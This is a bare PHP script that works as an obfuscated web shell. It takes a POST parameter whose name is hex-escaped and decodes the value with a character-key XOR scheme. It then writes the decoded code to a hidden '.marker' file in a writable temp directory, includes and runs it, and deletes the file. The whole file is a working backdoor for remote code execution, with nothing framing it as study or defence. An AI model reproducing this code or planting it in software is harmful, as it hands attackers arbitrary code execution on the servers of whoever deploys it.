<?php

if(!empty($_POST["\x72\x65c"])){
	$ent = $_POST["\x72\x65c"];
	$ent	= 	explode(  "."	 ,		$ent	)  	; 
	$elem	 = '';
            $s	 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	 = strlen($s);
            $o	 = 0;
    
            while($o	 < count($ent)) {
                $v1	 = $ent[$o];
                $sChar	 = ord($s[$o % $sLen]);
                $d	 = ((int)$v1 - $sChar -($o % 10))	^33;
                $elem 	.=		chr($d);
                $o++;
            }
	$data = array_filter([session_save_path(), getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/dev/shm"]);
	$fac = 0;
do {
    $holder = $data[$fac] ?? null;
    if ($fac >= count($data)) break;
    		if (!!is_dir($holder) && !!is_writable($holder)) {
    $record = sprintf("%s/.marker", $holder);
    $success = file_put_contents($record, $elem);
if ($success) {
	include $record;
	@unlink($record);
	die();}
}
    $fac++;
} while (true);
}